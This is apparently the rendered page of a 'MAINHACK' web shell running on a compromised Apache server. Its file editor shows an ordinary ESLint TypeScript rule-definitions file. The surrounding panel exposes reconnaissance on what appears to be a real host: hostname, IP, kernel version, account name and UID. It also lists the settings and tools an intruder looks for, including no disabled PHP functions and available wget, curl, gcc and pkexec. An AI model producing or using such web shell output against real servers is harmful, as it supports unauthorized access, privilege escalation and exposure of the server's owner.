[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: variables.d.ts
import { Linter } from "../index"; export interface Variables extends Linter.RulesRecord { /** * Rule to require or disallow initialization in variable declarations. * * @since 1.0.0-rc-1 * @see https://eslint.org/docs/rules/init-declarations */ "init-declarations": | Linter.RuleEntry<["always"]> | Linter.RuleEntry< [ "never", Partial<{ ignoreForLoopInit: boolean; }>, ] >; /** * Rule to disallow deleting variables. * * @remarks * Recommended by ESLint, the rule was enabled in `eslint:recommended`. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-delete-var */ "no-delete-var": Linter.RuleEntry<[]>; /** * Rule to disallow labels that share a name with a variable. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-label-var */ "no-label-var": Linter.RuleEntry<[]>; /** * Rule to disallow specified global variables. * * @since 2.3.0 * @see https://eslint.org/docs/rules/no-restricted-globals */ "no-restricted-globals": Linter.RuleEntry< [ ...Array< | string | { name: string; message?: string | undefined; } > ] >; /** * Rule to disallow variable declarations from shadowing variables declared in the outer scope. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-shadow */ "no-shadow": Linter.RuleEntry< [ Partial<{ /** * @default false */ builtinGlobals: boolean; /** * @default 'functions' */ hoist: "functions" | "all" | "never"; allow: string[]; }>, ] >; /** * Rule to disallow identifiers from shadowing restricted names. * * @remarks * Recommended by ESLint, the rule was enabled in `eslint:recommended`. * * @since 0.1.4 * @see https://eslint.org/docs/rules/no-shadow-restricted-names */ "no-shadow-restricted-names": Linter.RuleEntry<[]>; /** * Rule to disallow the use of undeclared variables unless mentioned in `global` comments. * * @remarks * Recommended by ESLint, the rule was enabled in `eslint:recommended`. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-undef */ "no-undef": Linter.RuleEntry< [ Partial<{ /** * @default false */ typeof: boolean; }>, ] >; /** * Rule to disallow initializing variables to `undefined`. * * @since 0.0.6 * @see https://eslint.org/docs/rules/no-undef-init */ "no-undef-init": Linter.RuleEntry<[]>; /** * Rule to disallow the use of `undefined` as an identifier. * * @since 0.7.1 * @see https://eslint.org/docs/rules/no-undefined */ "no-undefined": Linter.RuleEntry<[]>; /** * Rule to disallow unused variables. * * @remarks * Recommended by ESLint, the rule was enabled in `eslint:recommended`. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-unused-vars */ "no-unused-vars": Linter.RuleEntry< [ Partial<{ /** * @default 'all' */ vars: "all" | "local"; varsIgnorePattern: string; /** * @default 'after-used' */ args: "after-used" | "all" | "none"; /** * @default false */ ignoreRestSiblings: boolean; argsIgnorePattern: string; /** * @default 'none' */ caughtErrors: "none" | "all"; caughtErrorsIgnorePattern: string; }>, ] >; /** * Rule to disallow the use of variables before they are defined. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-use-before-define */ "no-use-before-define": Linter.RuleEntry< [ | Partial<{ /** * @default true */ functions: boolean; /** * @default true */ classes: boolean; /** * @default true */ variables: boolean; }> | "nofunc", ] >; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.41 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002